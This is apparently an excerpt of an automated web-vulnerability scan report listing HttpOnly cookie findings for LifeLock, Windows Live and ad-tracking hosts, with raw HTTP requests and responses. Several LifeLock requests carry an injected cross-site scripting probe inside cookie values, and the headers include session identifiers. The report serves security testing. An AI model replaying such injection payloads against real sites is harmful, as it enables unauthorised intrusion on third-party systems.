<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

18.402. https://secure.lifelock.com/portal/account-reset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/account-reset

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/account-reset HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:42 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Content-Length: 3714
Expires: Sun, 24 Apr 2011 17:10:42 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=692fab84250b2cb5007b0012b4fc7e60945c3cbfd48195b84db4560e; Path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>myLifeLock - Account Reset</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" media="sc
...[SNIP]...

18.403. https://secure.lifelock.com/resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; promoCode=NEXT; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=558a8c6653a460b9c2687d51668e64d388910a444dc07de74db4541e

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:27 GMT
Last-Modified: Fri, 22 Apr 2011 04:26:56 GMT
Expires: Sun, 24 Apr 2011 17:47:27 GMT
Cache-Control: max-age=3600
Content-Length: 1553
Connection: close
Content-Type: image/gif
Set-Cookie: TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; Path=/

GIF89a............................wwwfffUUUDDD333""".........................................................!..NETSCAPE2.0.....!.......,..........w $B..$..B.#..#..(<L....
3.....D....H$^..@....Pd..."U
...[SNIP]...

18.404. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

18.405. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

18.406. https://secure.lifelock.com/scripts/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

18.407. https://secure.lifelock.com/siteopt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /siteopt.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /siteopt.js HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:56:13 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:11:13 GMT
Content-Length: 1584
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=4a3c0ed3ea5523ba1800bec892f24bb0945c3cbfd48195b84db4562d; Path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>myLifeLock</title>
       <link href="styles/login.css" rel="stylesheet" type="text/css" media="screen"/>
       <link rel
...[SNIP]...

18.408. https://secure.lifelock.com/styles/login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

18.409. https://secure.lifelock.com/styles/theme-lifelock.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

18.410. https://secure.lifelock.com/styles/webstore.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

18.411. https://security.live.com/LoginStage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 25919
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=ucdfqwzg0orvw3jxqhywn2mz; path=/; HttpOnly
Set-Cookie: xid=b79f02fa-b994-43d5-a76d-1fdbf35adae9&&BAYxxxxxxx1D05&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=930347861&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 24-Apr-2011 15:16:18 GMT; path=/
Set-Cookie: wlv=A|_-d:s*stM6Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:tuRFqrfQzYg=:2A86sT3CApx4bD1TSQD2FQiQePyCL8+HQuLs/qy4iBg=:F; domain=.live.com; path=/
PPServer: PPV: 30 H: BAYIDSTOOL1D05 V: 0
Date: Sun, 24 Apr 2011 16:56:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

18.412. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/306995535/direct;;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSB46AiKb/zMBAEXnBjU="

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:58:33 GMT
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR2cEMJJv+MwHJQ0dAZPN/JgBmUQdf";Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 23-Apr-2012 15:58:33 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Content-Length: 43
Connection: close
Server: Jetty(7.3.1.v20110307)

GIF89a.............!.......,...........D..;

18.413. http://sftrack.searchforce.net/SFConversionTracking/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sftrack.searchforce.net
Path:   /SFConversionTracking/redir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SFConversionTracking/redir?jadid=6589725365&jk=credit%20monitoring%20service&js=1&jmt=1_b_&jp=&jkId=8a8ae4e72e3a0b58012e4f128cd461ee&jaid=27686&jt=3&jsid=21865&jr=http%3A%2F%2Flanding.americanexpress.com%2Fv2.php%3Ftype%3Dv2&&gclid=CNqttZH1tagCFQbe4AodEirYCA HTTP/1.1
Host: sftrack.searchforce.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: sf_conv_info_27686=cid%3D878913ba-9bfa-46c2-b65c-ff340166054d%26csesid%3D21865%26caid%3D27686%26csk%3Dcredit+monitoring+service%26cmt%3D1_b_%26clandtime%3D04%2F24%2F2011+12%3A53%3A38+PDT%26ctest%3Dfalse%26cadoid%3D1%26ckfk%3D8a8ae4e72e3a0b58012e4f128cd461ee%26cagfk%3D%26cadid%3D6589725365%26ckid%3D-1%26cp%3D%26; Expires=Tue, 24-May-2011 19:53:38 GMT
P3P: policyref="http://sftrack.searchforce.net/SFConversionTracking/w3c/p3p.xml", CP="NOI CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Referer:
Location: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
Content-Length: 0
Date: Sun, 24 Apr 2011 19:53:37 GMT


